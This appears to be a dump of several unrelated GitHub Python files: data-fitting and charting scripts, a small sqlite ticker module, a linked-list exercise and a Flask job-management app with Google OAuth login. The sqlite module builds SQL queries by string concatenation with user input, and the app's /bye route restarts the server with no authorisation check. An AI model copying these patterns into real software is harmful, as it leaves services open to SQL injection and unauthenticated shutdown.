rd(t-td)\r\n Since r and b are coupled we set r=1\r\n \r\n Args:\r\n - time: time vector\r\n - engagement: engagement at times specified\r\n in time vector\r\n \r\n Returns:\r\n - a, b, g, n, s: model parameters\r\n \"\"\"\r\n \r\n def biexponential_free_delay(x_, d_alpha, beta, gamma, eta, sigma, delay):\r\n \"\"\"Solution to second order system. Assumes that the time bins\r\n are spaced 1 hour apart (tau_d is the delay given in hours).\r\n\r\n Note that gamma and alpha are positive, whereas they are negative\r\n in the original equation system.\r\n \"\"\"\r\n #tau_dn = int(tau_d*100)\r\n #u_delay = np.concatenate((np.zeros(tau_dn), np.ones(len(x_)-tau_dn)))\r\n #return eta*np.exp(-alpha*x_) + (sigma+(beta/(gamma-alpha)))*np.exp(-alpha*(x_-tau_d))*u_delay - (beta/(gamma-alpha))*np.exp(-gamma*(x_-tau_d))*u_delay \r\n delay_n=int(delay)\r\n alpha = gamma + d_alpha\r\n delayed = (sigma+(beta/(gamma-alpha)))*np.exp(-alpha*(x_-delay)) - (beta/(gamma-alpha))*np.exp(-gamma*(x_-delay))\r\n delayed[:delay_n] = 0\r\n return eta*np.exp(-alpha*x_) + delayed\r\n \r\n def biexponential_fixed_delay(x_, d_alpha, beta, gamma, eta, sigma):\r\n \"\"\"Solution to second order system. Assumes that the time bins\r\n are spaced 1 hour apart (delay is given by encapsulating function hours).\r\n\r\n Note that gamma and alpha are positive, whereas they are negative\r\n in the original equation system.\r\n \"\"\"\r\n #tau_dn = int(tau_d*100)\r\n #u_delay = np.concatenate((np.zeros(tau_dn), np.ones(len(x_)-tau_dn)))\r\n alpha = gamma + d_alpha\r\n delayed = (sigma+(beta/(gamma-alpha)))*np.exp(-alpha*(x_-delay)) - (beta/(gamma-alpha))*np.exp(-gamma*(x_-delay))\r\n delayed[:delay] = 0\r\n return eta*np.exp(-alpha*x_) + delayed\r\n # return eta*np.exp(-alpha*x_) + (sigma+(beta/(gamma-alpha)))*np.exp(-alpha*(x_-tau_d))*u_delay - (beta/(gamma-alpha))*np.exp(-gamma*(x_-tau_d))*u_delay \r\n\r\n method_ = 'trf'\r\n if delay != 0:\r\n bounds_ = ([1e-5, 1e-2, 1e-5, 1, 1e-5],\r\n [1e3, 1e9, 1e3, 1e9, 1e6])\r\n init = [1e-1, 1, 1e-1, 2, 1]\r\n popt, _ = curve_fit(biexponential_fixed_delay, time, engagement,\r\n p0=init, bounds=bounds_, method=method_, loss=loss_)\r\n d_a, b, g, n, s, td = popt[0], popt[1], popt[2], popt[3], popt[4], 0\r\n \r\n else:\r\n tau_max = int(time[-1]-time[0])\r\n # instead of fitting gamma, use auxillary parameter c=alpha-gamma, which is\r\n # always less than 0 (if alpha and gamma are defined negative) and describes the\r\n # discrepancy between the types of decay. Using gamma < alpha < 0 will give an error.\r\n bounds_ = ([1e-5, 1e-2, 1e-5, 1, 1e-5, 0],\r\n [1e3, 1e9, 1e3, 1e9, 1e6, tau_max])\r\n init = [1e-1, 1, 1e-1, 2, 1, int(0.5*tau_max)]\r\n\r\n # Linear fit (alt. L1 fit with 'soft_l1')\r\n popt, _ = curve_fit(biexponential_free_delay, time, engagement,\r\n p0=init, bounds=bounds_, method=method_, loss=loss_)\r\n d_a, b, g, n, s, td = popt[0], popt[1], popt[2], popt[3], popt[4], popt[5]\r\n \r\n a = g + d_a\r\n return a, b, g, n, s, td\r\n","repo_name":"joel-n/exploring-twitter-api","sub_path":"curve_fitting.py","file_name":"curve_fitting.py","file_ext":"py","file_size_in_byte":10893,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"25063728968","text":"def madlib():\n school_name = input(\"Enter School Name: \")\n adj1 = input(\"Enter Adjective: \")\n color = input(\"Enter Color: \")\n plural_noun = input(\"Enter Plural Noun: \")\n adj2 = input(\"Enter Adjective: \")\n animal = input(\"Enter Animal: \")\n adj3 = input(\"Enter Adjective: \")\n\n paragraph = f\"At {school_name}, students were in for a {adj1} surprise. \\\nThe cafeteria served {color} {plural_noun} for lunch, causing uproar! \\\nThe principal danced a {adj2} jig to resolve the chaos, \\\nwhile the school mascot, a giant {animal}, cheered in the {adj3} gym.\"\n\n print(f\"Your output paragraph is as follows:\\n{paragraph}\")\n","repo_name":"azizmalik787/pythonProjects","sub_path":"madlibs/madlibs_inventory/school.py","file_name":"school.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33490363787","text":"\nimport numpy as np\nimport pandas as pd\nimport plotly.express as px\n\nimport sqlite3\ncon = sqlite3.connect(r'C:\\Users\\vivek\\Documents\\Code\\local-items\\30daychartchallenge-data\\30daychartchallenge-data.sqlite3')\ndf = pd.read_sql_query(\"SELECT * from 'per-capita-energy-use'\", con)\n\n\n# prepare data\nenergy = energy[energy.Entity.isin(['United Kingdom', 'United States', \\\n 'Australia', 'Chile', 'India'])]\nenergy = energy[energy.Year.isin(['1965', '2019'])]\nenergy.columns = ['country', 'code', 'year', 'value']\nenergy.value = energy.value.round()\n\n# calculate variables for plot\ndf = energy\nyear1=1965\nyear2=2019\nvp_offset = (year2 - year1)/2\nyear1val = df[df.year==1965].value.to_list()\nyear2val = df[df.year==2019].value.to_list()\ncat1val = df[df.year==1965].country.to_list()\nvp_min = -min(year1val+year2val)*0.95\nvp_max = max(year1val+year2val)*1.05\n\n# Making the SLOPEGRAPH using plotly\nimport plotly.graph_objects as go\nfig = go.Figure()\nfor x_val, y_val, cat_val in zip(year1val, year2val, cat1val):\n fig.add_trace(go.Scatter(x=[year1, year2], y=[x_val, y_val], mode='lines+markers+text', text=[cat_val, cat_val], textposition=['middle left', 'middle right'] ))\nfig.update_layout(showlegend=False) \nfig.add_shape(type=\"line\", x0=year1, y0=vp_min, x1=year1, y1=vp_max,line=dict(color=\"Grey\",width=2))\nfig.add_shape(type=\"line\", x0=year2, y0=vp_min, x1=year2, y1=vp_max,line=dict(color=\"Grey\",width=2))\nfig.update_yaxes(range=[vp_min, vp_max] ) #, showticklabels=False)\nfig.update_xaxes(range=[year1-vp_offset, year2+vp_offset] ) # showticklabels=False\n# Title\nfig.add_annotation(dict(xref='paper',yref='paper',x=0.5,y=1.22,xanchor='center',yanchor='top', \nfont=dict(family='Arial',size=24,color='grey'),showarrow=False, \ntext='Energy Use Per Person'))\n# Subtitle\nfig.add_annotation(dict(xref='paper',yref='paper',x=0.5,y=1.085,xanchor='center',yanchor='top',\nfont=dict(family='Arial',size=14,color='grey'),showarrow=False,\ntext='1965 vs 2019'))\n# Footer\nfig.add_annotation(dict(xref='paper',yref='paper',x=0.5,y=-0.07,xanchor='center',yanchor='top',\nfont=dict(family='Arial', size=12, color='grey'),showarrow=False,\ntext='#30DayChartChallenge - slope - 2021/04/05'))\nfig.add_annotation(dict(xref='paper',yref='paper',x=0.5,y=-0.13,xanchor='center',yanchor='top',\nfont=dict(family='Arial', size=12, color='grey'),showarrow=False,\ntext='https://ourworldindata.org/grapher/per-capita-energy-use'))\nfig.add_annotation(dict(xref='paper',yref='paper',x=0.5,y=-0.21,xanchor='center',yanchor='top',\nfont=dict(family='Arial', size=12, color='grey'),showarrow=False,\ntext='twitter.com/vivekparasharr | github.com/vivekparasharr | vivekparasharr.medium.com'))\nfig.show()\n","repo_name":"vivekparasharr/Challenges-and-Competitions","sub_path":"30DayChartChallenge/20210405-comparisons-slope.py","file_name":"20210405-comparisons-slope.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"74982621227","text":"import sqlite3\n\nimport loadStickersToDatabase\n\nSQLITE_PATH = \"data_source/database.db\"\n\nDB_CONN = sqlite3.connect(SQLITE_PATH, check_same_thread=False)\n\nPAGE_SYMBOLS = 20\n\n\ndef get_db():\n return DB_CONN\n\n\ndef close_db():\n if DB_CONN is not None:\n DB_CONN.close()\n\n\ndef drop_table():\n sql_str = \"DROP TABLE IF EXISTS \" + loadStickersToDatabase.TICKERS_TABLE\n DB_CONN.execute(sql_str)\n\n\ndef create_table(header_cols):\n # Generate sql string for create table\n sql_str = \"CREATE TABLE \" + loadStickersToDatabase.TICKERS_TABLE\n sql_str += \" (Id INTEGER PRIMARY KEY AUTOINCREMENT,\"\n DB_CONN.execute(sql_str + header_cols + \")\")\n print(\">>>> table created <<<<\")\n\n\ndef insert_row(row_str):\n cur = DB_CONN.cursor()\n cur.execute(row_str)\n DB_CONN.commit()\n\n\ndef get_symbols(fromId=1, fromTicker=\"\"):\n if not fromTicker == \"\":\n sql_str = \"SELECT Id FROM \" + loadStickersToDatabase.TICKERS_TABLE + \" WHERE Symbol='\" + fromTicker + \"'\"\n cursor = DB_CONN.cursor()\n cursor.execute(sql_str)\n records = cursor.fetchall()\n fromId = records[0][0] + 1\n\n toId = fromId + PAGE_SYMBOLS - 1\n\n sql_str = \"SELECT * FROM \" + loadStickersToDatabase.TICKERS_TABLE + \" WHERE Id BETWEEN \" + str(fromId) + \" AND \" + str(toId)\n cursor = DB_CONN.cursor()\n cursor.execute(sql_str)\n return cursor.fetchall()\n\n\ndef search_symbols(search_string):\n if search_string == \"\":\n return \"\"\n else:\n sql_str = \"SELECT * FROM \" + loadStickersToDatabase.TICKERS_TABLE + \" WHERE Symbol LIKE '%\" + search_string + \"%'\"\n cursor = DB_CONN.cursor()\n cursor.execute(sql_str)\n return cursor.fetchall()\n","repo_name":"futurename/C70_Python_Final_Project","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73394429867","text":"class Node:\n def __init__(self, x: int, next: \"Node\" = None, random: \"Node\" = None):\n self.val = int(x)\n self.next = next\n self.random = random\n\n\nclass Solution:\n @staticmethod\n def copy_random_list(head: Node | None) -> Node | None:\n if head is None:\n return None\n\n old_list, new_list = [], []\n\n while head is not None:\n new_node = Node(head.val)\n new_node.random = head.random\n\n if len(new_list) != 0:\n new_list[-1].next = new_node\n\n new_list.append(new_node)\n old_list.append(head)\n head = head.next\n\n for node_1 in new_list:\n if node_1.random is None:\n continue\n for index, node_2 in enumerate(old_list):\n if node_1.random == node_2:\n node_1.random = new_list[index]\n\n return new_list[0]\n\n\nif __name__ == \"__main__\":\n Solution().copy_random_list(None)\n","repo_name":"ajesh-mishra/python_leetcode","sub_path":"lc_138_copy_list_with_random_pointer.py","file_name":"lc_138_copy_list_with_random_pointer.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"765050337","text":"from time import time\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom flask import Flask, render_template, redirect, url_for\nfrom flask import request\nfrom flask import session\nfrom flask import make_response\nfrom markupsafe import escape\nimport sys\nimport os\nimport subprocess\nfrom sfapi import Sfapi\n\nimport json\nfrom oauthlib.oauth2 import WebApplicationClient\nimport requests\nimport secrets\nimport string\n\nGOOGLE_CLIENT_ID = os.environ.get(\"GOOGLE_CLIENT_ID\", None)\nGOOGLE_CLIENT_SECRET = os.environ.get(\"GOOGLE_CLIENT_SECRET\", None)\nGOOGLE_DISCOVERY_URL = (\"https://accounts.google.com/.well-known/openid-configuration\")\nif 0:\n print(f\" GOOGLE_CLIENT_ID: {GOOGLE_CLIENT_ID}\")\n print(f\" GOOGLE_CLIENT_SECRET: {GOOGLE_CLIENT_SECRET}\")\n print(f\" GOOGLE_DISCOVERY_URL: {GOOGLE_DISCOVERY_URL}\")\nclient = WebApplicationClient(GOOGLE_CLIENT_ID)\n\n# Return map of [username, googlename] indexed by authorized google IDs.\n# File lines are:\n# username google-id google-name\n# The last may include single spaces\ndef get_google_ids():\n gids = {}\n fnam = '/home/descprod/local/etc/google_ids.txt'\n try:\n fids = open(fnam)\n for line in fids.readlines():\n words = line.split()\n if len(words):\n unam = words[0]\n gid = words[1]\n gnam = ' '.join(words[2:])\n gids[gid] = [unam, gnam]\n fids.close()\n except FileNotFoundError:\n print(f\"get_google_ids: ERROR: Google ID list not found: {fnam}\")\n return gids\n\napp = Flask(__name__, static_url_path='/home/descprod/static')\n\nfrom descprod import sdate\nfrom descprod import UserData\nfrom descprod import JobData\nfrom descprod import JobTable\n\nclass SessionData:\n \"\"\"\n The SessionData class holds global data for the service and its sessions.\n SessionData objects describe sessions.\n \"\"\"\n dbg = False # Log is noisy if true.\n use_cookie_key = True # If true session key is obtained from cookie.\n cookie_key_lifetime = 3600 # Lifetime [sec] to set for cookie keys.\n sessions = {} # Map of active sessions indexed by session key\n current = None # Cache the current session\n site = subprocess.getoutput('cat /home/descprod/local/etc/site.txt')\n google_ids = get_google_ids() # [descname, fullname] indexed by google ID\n lognam = None # Job log file\n stanam = None # Last line is status or processing\n cfgnam = 'config.txt' # Name for config file describing ther job\n logfil = None\n fout = None\n sjob = None\n rundir = None\n com = None\n ret = None\n force_https = False\n @classmethod\n def nologin_session(cls):\n \"\"\"Fetch the data for the no-login session.\"\"\"\n if None not in SessionData.sessions:\n SessionData.sessions[None] = SessionData(None, 'nologin', {})\n return SessionData.sessions[None]\n @classmethod\n def get(cls):\n \"\"\"\n Return the data for the current session.\n If a user is logged in, then sesskey, descname, fullname, login_info etc. will be set.\n If not, sesskey is None and name is 'nologin'.\n \"\"\"\n if SessionData.current is not None: return SessionData.current\n if SessionData.use_cookie_key:\n sesskey = request.cookies.get('sesskey')\n if sesskey is None:\n if SessionData.dbg: print('SessionData.get: Cookie with user key not found.')\n else:\n if 'sesskey' in session:\n sesskey = session['sesskey']\n else:\n if SessionData.dbg: print('SessionData.get: Session does not have a key')\n sesskey = None\n if sesskey in cls.sessions:\n SessionData.current = cls.sessions[sesskey]\n else:\n if sesskey is not None:\n print(f\"SessionData.get: ERROR: Unexpected session key: {sesskey}\")\n print(f\"SessionData.get: ERROR: Known keys: {cls.sessions.keys()}\")\n SessionData.current = SessionData.nologin_session()\n return SessionData.current\n def __init__(self, sesskey, descname, fullname=None, login_info={}):\n \"\"\"Add an active user.\"\"\"\n self.sesskey = sesskey\n self.descname = descname\n self.fullname = fullname\n self.login_info = login_info\n self.session_id = 0 if sesskey is None else get_sessionid()\n self.msg = [] # Error message shown once on home page.\n self._user = None\n assert sesskey not in SessionData.sessions\n SessionData.sessions[sesskey] = self\n print(f\"SessionData.init: Updated active user count is {len(SessionData.sessions)}\")\n assert sesskey in SessionData.sessions\n def user(self):\n if self._user is None:\n self._user = UserData.get(self.descname)\n sdat = SessionData.get()\n rstat, sdat.msg = self._user.check_dirs()\n return self._user\n def make_response(self, rdat):\n \"\"\"\n Make an HTML response from the provided response data.\n Typically called from home().\n if SessionData.use_cookie_key is true, then create a new sesskey cookie with\n the value SessionData.cookie_key and lifetime SessionData.cookie_key_lifetime.\n \"\"\"\n resp = make_response(rdat)\n if SessionData.use_cookie_key:\n if self.sesskey is None:\n resp.set_cookie('sesskey', '', expires=0)\n else:\n texp = datetime.timestamp(datetime.now()) + SessionData.cookie_key_lifetime\n resp.set_cookie('sesskey', str(self.sesskey), expires=texp)\n else:\n session.modified = True\n SessionData.current = None\n return resp\n\n# Get the base url from a flask request.\ndef fixurl(url):\n if SessionData.force_https:\n url = url.replace('http:', 'https:', 1)\n return url\n\ndef html_head():\n msg = '\\n'\n msg += '\\n'\n msg += '\\n'\n #msg += f\"\"\" \"\"\"\n msg += '\\n'\n #msg += ' '\n msg += '\\n'\n return msg\n\ndef table_wrap(inmsg):\n msg = ''\n #msg += '
    \\n'\n #msg += ''\n msg += inmsg\n #msg += '\\n
    \\n'\n return msg\n\nif __name__ == '__main__':\n app.run(ssl_context=('/home/descprod/cert.pem', 'key.pem'))\napp.secret_key = os.urandom(24)\napp.permanent_session_lifetime = timedelta(minutes=5)\nif 'SERVER_OPTS' in os.environ:\n opts=os.environ['SERVER_OPTS'].split()\n for opt in opts:\n print(f\"Processing server option {opt}\")\n if opt == 'debug':\n SessionData.dbg = True\n elif opt == 'force-https':\n SessionData.force_https = True\n else:\n print(f\"Ignoring invalid option {opt}\")\n\ndef get_jobid():\n fnam = '/home/descprod/local/etc/jobid.txt'\n jobid = int(subprocess.getoutput(f\"descprod-next-jobid\"))\n return jobid\n\ndef get_sessionid():\n lines = subprocess.getoutput(f\"descprod-next-sessionid\").splitlines()\n sesid = int(lines[-1])\n for line in lines[0:-1]:\n print(f\"get_sessionid: {line}\")\n if SessionData.dbg: print(f\"get-sessionid: Session ID is {sesid}\")\n return sesid\n\n@app.route(\"/\")\ndef top():\n return redirect(url_for('home'))\n\n@app.route(\"/home\")\ndef home():\n \"\"\"\n Create and return the home page.\n Most http commands will redirect here.\n If the session doe not have an active user, generic data is displayed\n along with a button to log in.\n If the session is for an authenticated user, his or her info is displayed.\n if sdat.msg has content, it is displayed near the top iof the page and then\n cleared so it will not appear when the page is refreshed.\n It can be either a string or a list of strings.\n The lifetime of the session or cookie user key is refreshed.\n \"\"\"\n #return render_template('index.html')\n if SessionData.dbg: print('home: Constructing home page.')\n sep = '
    \\n'\n msg = html_head()\n msg += '

    DESCprod

    \\n'\n sdat = SessionData.get()\n udat = sdat.user()\n if SessionData.dbg: print(f\"home: User is {sdat.user()} [{sdat.sesskey}]\")\n have_user = sdat.sesskey is not None\n if have_user and True:\n # Refresh page each time listener selects browser tab.\n msg += '\\n'\n # Refresh page every 60 sec.\n #msg += '\\n'\n if have_user or True:\n if len(sdat.msg):\n if isinstance(sdat.msg, list):\n lines = sdat.msg\n else:\n lines = [str(sdat.msg)]\n msg += f\"
    \\n\"\n msg += f\"
    \\n\"\n            lsep = ''\n            for line in lines:\n                msg += f\"{lsep}{line}\"\n                lsep = '\\n'\n            msg += f\"\\n
    \\n\"\n msg += f\"
    {sep}\"\n sdat.msg = []\n msg += f\"Site: {SessionData.site}\"\n msg += sep\n if have_user:\n msg += f\"User: {sdat.descname}\"\n if sdat.fullname is not None: msg+= f\" ({sdat.fullname})\"\n #msg += f\" [{sdat.sesskey}]\"\n msg += sep\n #msg += f\"Login info: {sdat.login_info}\"\n #msg += sep\n msg += f\"Session: {sdat.session_id}\"\n msg += sep\n msg += f\"UTC time: {sdate()}\"\n #msg += f\" [{sdat.sesskey}]\"\n msg += sep\n msg += sep\n jtab = JobTable(udat.descname)\n if (jtab.error_message):\n msg += f\"ERROR: {jtab.error_message}\"\n return sdat.make_response(msg)\n # Use the last job to to get the starting job config if it is not already set.\n if udat.jobtype == '':\n jids = list(jtab.jobs.keys())\n if len(jids):\n jids.sort()\n jid_last = jids[-1]\n job_last = jtab.jobs[jid_last]\n udat.jobtype = job_last.jobtype()\n udat.config = job_last.config()\n udat.howfig = job_last.howfig()\n njob = len(jtab.jobs)\n msg += f\"User {udat.descname} has {njob} active job\"\n if njob != 1: msg += 's'\n if njob:\n msg += ':'\n msg += sep\n msg += table_wrap(jtab.to_html(fixurl(request.base_url)[0:-5]))\n msg += sep\n #msg += f\"{status()}\"\n #if SessionData.stanam is not None:\n # sjstat = 'Not found'\n # try:\n # jsin = open(SessionData.stanam, 'r')\n # sjtext = jsin.readlines()\n # if len(sjtext): sjstat = sjtext[-1]\n # except FileNotFoundError:\n # sjstat = f\"File not found: {SessionData.stanam}\"\n # msg += sep\n # msg += f\"Status: {sjstat}\"\n #if SessionData.sjobid is not None:\n # msg += sep\n # msg += f\"Config: {SessionData.sjob}\"\n # msg += sep\n # msg += f\"Command: {SessionData.com}\"\n # msg += sep\n # msg += f\"Run dir: {SessionData.rundir}\"\n msg += sep\n msg += f'''\\nCreate job: '''\n msg += f''''''\n msg += f''''''\n msg += f''''''\n msg += f''''\n msg += sep\n msg += '\\n'\n msg += '\\n'\n msg += '\\n'\n #msg += ''\n msg += '\\n'\n if udat.is_admin(): msg += '\\n'\n else:\n msg += sep\n msg += ''\n msg += '
    '\n return sdat.make_response(msg)\n\n@app.route(\"/login\")\ndef login():\n google_provider_cfg = requests.get(GOOGLE_DISCOVERY_URL).json()\n authorization_endpoint = google_provider_cfg[\"authorization_endpoint\"]\n redirect_uri = fixurl(request.base_url) + \"/callback\"\n # For anything but local host, make sure redirect is https.\n if redirect_uri[0:5] == 'http:' and redirect_uri.find('localhost') < 0 and redirect_uri.find('127.0.0.1') < 0:\n redirect_uri = redirect_uri.replace('http:', 'https:')\n if SessionData.dbg: print(f\"login: URI: {redirect_uri}\")\n scope=[\"openid\", \"email\", \"profile\"]\n request_uri = client.prepare_request_uri(\n authorization_endpoint,\n redirect_uri=redirect_uri,\n scope=scope\n )\n if SessionData.dbg: print(f\"login: Auth: {authorization_endpoint}\")\n if SessionData.dbg: print(f\"login: Request: {request_uri}\")\n res = redirect(request_uri)\n if SessionData.dbg: print(f\"login: Result: {res}\")\n return res\n\n@app.route(\"/logout\")\ndef logout():\n sdat = SessionData.get()\n if sdat is None:\n print('logout: Logout requested without login. Might be expired.')\n else:\n del SessionData.sessions[sdat.sesskey]\n session['sesskey'] = None\n SessionData.current = SessionData.nologin_session()\n return redirect(url_for('home'))\n\n@app.route(\"/help\")\ndef help():\n return render_template('help.html')\n\n@app.route(\"/bye\")\ndef bye():\n print(\"bye: Shutting down.\")\n com = f\"sleep 3; kill -9 {os.getpid()}\"\n subprocess.Popen(com, shell=True)\n sdat = SessionData.get()\n sdat.msg += ['Restarting server.']\n return redirect(url_for('home'))\n\n@app.route(\"/login/callback\")\ndef callback():\n if SessionData.dbg: print('callback: Handling google callback')\n # Fetch tokens.\n code = request.args.get(\"code\")\n google_provider_cfg = requests.get(GOOGLE_DISCOVERY_URL).json()\n token_endpoint = google_provider_cfg[\"token_endpoint\"]\n if request.is_secure:\n authresp = fixurl(request.url)\n else:\n authresp = None\n print(f\"callback: **************** authresp: {authresp}\")\n token_url, headers, body = client.prepare_token_request(\n token_endpoint,\n authorization_response = authresp,\n redirect_url = fixurl(request.base_url),\n code = code\n )\n if SessionData.dbg:\n print('callback: --------- BEGIN Token post')\n print(f\"callback: token_url: {token_url}\")\n print(f\"callback: headers: {headers}\")\n print(f\"callback: token_url: {token_url}\")\n print(f\"callback: data: {body}\")\n print(f\"callback: auth: {GOOGLE_CLIENT_ID}, *****\")\n print('callback: --------- END Token response')\n token_response = requests.post(\n token_url,\n headers=headers,\n data=body,\n auth=(GOOGLE_CLIENT_ID, GOOGLE_CLIENT_SECRET),\n )\n resp = token_response.json()\n if SessionData.dbg:\n print('callback: --------- BEGIN Token response')\n for key in resp:\n print(f\"callback: {key}: {resp[key]}\")\n print('callback: --------- END Token response')\n # Parse tokens and fetch user profile.\n client.parse_request_body_response(json.dumps(resp))\n userinfo_endpoint = google_provider_cfg[\"userinfo_endpoint\"]\n uri, headers, body = client.add_token(userinfo_endpoint)\n userinfo_response = requests.get(uri, headers=headers, data=body)\n login_info = userinfo_response.json()\n google_id = login_info[\"sub\"]\n fullname = login_info[\"name\"]\n user_label = f\"{fullname} ({google_id})\"\n #print(f\"callback: User info: {login_info\")\n resp = redirect(url_for('home'))\n sdat = SessionData.nologin_session()\n sesskey = None\n email = userinfo_response.json().get(\"email\")\n have_email = len(email) > 0\n email_verified = userinfo_response.json().get(\"email_verified\")\n # 06jan2023 Allow unverified email.\n verified = email_verified or have_email\n if verified:\n if google_id in SessionData.google_ids:\n print(f\"callback: Authorizing {user_label}\")\n login_info = userinfo_response.json()\n if SessionData.use_cookie_key:\n # The cookie is created in sdat.make_response\n # We need a string key.\n sesskey = ''.join(secrets.choice(string.ascii_letters+string.digits) for i in range(24))\n else:\n sesskey = app.secret_key = os.urandom(16)\n session['sesskey'] = sesskey\n session['fullname'] = fullname\n session.permanent = True # This enables the session to expire\n descname = SessionData.google_ids[google_id][0]\n else:\n print(f\"callback: Denying unauthorized user {user_label} [{email}]\")\n sdat.msg.append(f\"User not authorized: {google_id} {fullname}\")\n sdat.msg.append(f\"\\n
    Send the above line and your NERSC user name to admin@descprod.org to request authorization.\")\n else:\n print(f\"callback: Denying unverified user {user_label} [{email}]\")\n if not email_verified: sdat.msg.append(f\"User has not verified email with google: {fullname} [{email}]\")\n if not have_email: sdat.msg.append(f\"User does not have email with google: {fullname} [{google_id}]\")\n if sesskey is not None:\n sdat = SessionData(sesskey, descname, fullname, login_info)\n if not SessionData.use_cookie_key:\n session['session_id'] = sdat.session_id\n SessionData.current = sdat\n return redirect(url_for('home'))\n\n@app.route(\"/versions\")\ndef versions():\n #return f\"{os.getcwd()}
    {__file__}\"\n sep = '
    \\n'\n tbl = {}\n tbl['Python'] = subprocess.getoutput('echo $(python --version)')\n tbl['desc-prod'] = subprocess.getoutput('descprod-version')\n wprod = 0\n for prod in tbl:\n wprod = max(wprod, len(prod))\n outmsg = []\n for prod in tbl:\n outmsg += [f\"{prod.rjust(wprod+4)}: {tbl[prod]}\"]\n SessionData.get().msg = outmsg\n return redirect(url_for('home'))\n\n@app.route(\"/pmstatus\")\ndef pmstatus():\n sfapi = Sfapi()\n SessionData.get().msg = sfapi.get_status()\n return redirect(url_for('home'))\n return msg\n\n@app.route(\"/hello\")\ndef hello():\n name = ''\n if len(request.args):\n for snam in request.args:\n name += ' ' + snam\n else:\n name = ' NOONE'\n sdat = SessionData.get()\n if len(sdat.msg) == 0:\n sdat.msg = [\"

    Hellos from desc-prod

    \"]\n sdat.msg += [f\"hello{name}
    \"]\n return redirect(url_for('home'))\n\n@app.route('/form_create_job/', methods=['POST', 'GET'])\ndef run_form_create_job():\n if request.method == 'GET':\n return 'Got GET instead of POST!!'\n sdat = SessionData.get()\n jty = request.form['jobtype'].strip()\n #known_jty = ['parsltest']\n #if jty not in known_jty:\n # SessionData.get().msg.append(f\"Invalid job type: {jty}\")\n # return redirect(url_for('home'))\n cfg = request.form['config'].strip()\n hfg = request.form['howfig'].strip()\n print(f\"form_create_job: {jty} {cfg} {hfg}\")\n return do_create_job(jty, cfg, hfg)\n\ndef do_create_job(jty, cfg, hfg):\n myname = 'do_create_job'\n sdat = SessionData.get()\n if len(cfg) == 0:\n sdat.msg.append('Configuration must be provided when creating a job.')\n return redirect(url_for('home'))\n sid = sdat.session_id\n udat = sdat.user()\n if udat.descname == 'nologin':\n sdat.msg.append('Log in to make a job request')\n return redirect(url_for('home'))\n jobid = get_jobid()\n jdat = JobData(jobid, udat.descname)\n if len(jdat.errmsgs):\n sdat.msg.append(jdat.errmsgs)\n return redirect(url_for('home'))\n if jdat.configure(jty, cfg, hfg, sid):\n sdat.msg += jdat.errmsgs\n return redirect(url_for('home'))\n sdat.msg.append(f\"Configured {jty} {cfg} {hfg}\")\n udat.jobtype = jty\n udat.config = cfg\n udat.howfig = hfg\n return redirect(url_for('home'))\n\n@app.route('/startjob')\ndef start_job():\n sdat = SessionData.get()\n udat = sdat.user()\n if udat.descname == 'nologin':\n sdat.msg.append('Log in to start a job')\n return redirect(url_for('home'))\n jobid = int(request.args['id'])\n job = JobData.get_user_job(udat.descname, jobid)\n if job is None:\n sdat.msg.append(f\"Job {jobid} not found for user {udat.descname}\")\n return redirect(url_for('home'))\n cmsg = job.ready_to_run()\n if len(cmsg):\n sdat.msg.append(f\"Job {jobid} is not ready to run. {cmsg}\")\n return redirect(url_for('home'))\n if job.run():\n sdat.msg = job.errmsgs\n return redirect(url_for('home'))\n sdat.msg.append(f\"Started job {jobid} for user {job.descname()} in {job.rundir()}\")\n return redirect(url_for('home'))\n\n@app.route('/archivejob')\ndef archive_job():\n sdat = SessionData.get()\n udat = sdat.user()\n if udat.descname == 'nologin':\n sdat.msg.append('Log in to archive a job')\n return redirect(url_for('home'))\n jobid = int(request.args['id'])\n job = JobData.get_user_job(udat.descname, jobid)\n if job is None:\n sdat.msg.append(f\"Job {jobid} not found for user {udat.descname}\")\n else:\n arcfil = job.archive()\n if arcfil is None:\n sdat.msg.append(f\"Unable to archive Job {jobid} for user {udat.descname}\")\n else:\n sdat.msg.append(f\"Job archived at {arcfil}\")\n return redirect(url_for('home'))\n\n@app.route('/deletejob')\ndef delete_job():\n sdat = SessionData.get()\n udat = sdat.user()\n if udat.descname == 'nologin':\n sdat.msg.append('Log in to delete a job')\n return redirect(url_for('home'))\n jobid = int(request.args['id'])\n job = JobData.get_user_job(udat.descname, jobid)\n if job is None:\n sdat.msg.append(f\"Job {jobid} not found for user {udat.descname}\")\n else:\n delfil = job.delete()\n if delfil is not None:\n sdat.msg.append(f\"Job {jobid} scheduled for deletion at {delfil}\")\n return redirect(url_for('home'))\n\n@app.route('/copyjob')\ndef copy_job():\n sdat = SessionData.get()\n udat = sdat.user()\n if udat.descname == 'nologin':\n sdat.msg.append('Log in to delete a job')\n return redirect(url_for('home'))\n jobid = int(request.args['id'])\n job = JobData.get_user_job(udat.descname, jobid)\n if job is None:\n sdat.msg.append(f\"Job {jobid} not found for user {udat.descname}\")\n else:\n udat.jobtype = job.jobtype()\n udat.config = job.config()\n udat.howfig = job.howfig()\n return redirect(url_for('home'))\n\ndef ready():\n if SessionData.sjob is None: return True\n rcode = SessionData.ret.poll()\n if rcode is None: return False\n # Post job actions go here.\n return True\n\n@app.route('/status')\ndef status():\n if SessionData.sjob is None:\n msg = \"No job is started.\"\n else:\n rcode = SessionData.ret.poll()\n if ready():\n msg = f\"Job {SessionData.sjobid} returned {SessionData.ret.poll()}.\"\n else:\n msg = f\"Job {SessionData.sjobid} is running.\"\n return msg\n\n\n@app.route('/session')\ndef show_session():\n print(session)\n msg = 'Session data:\\n'\n for key in session.keys():\n msg += f\"
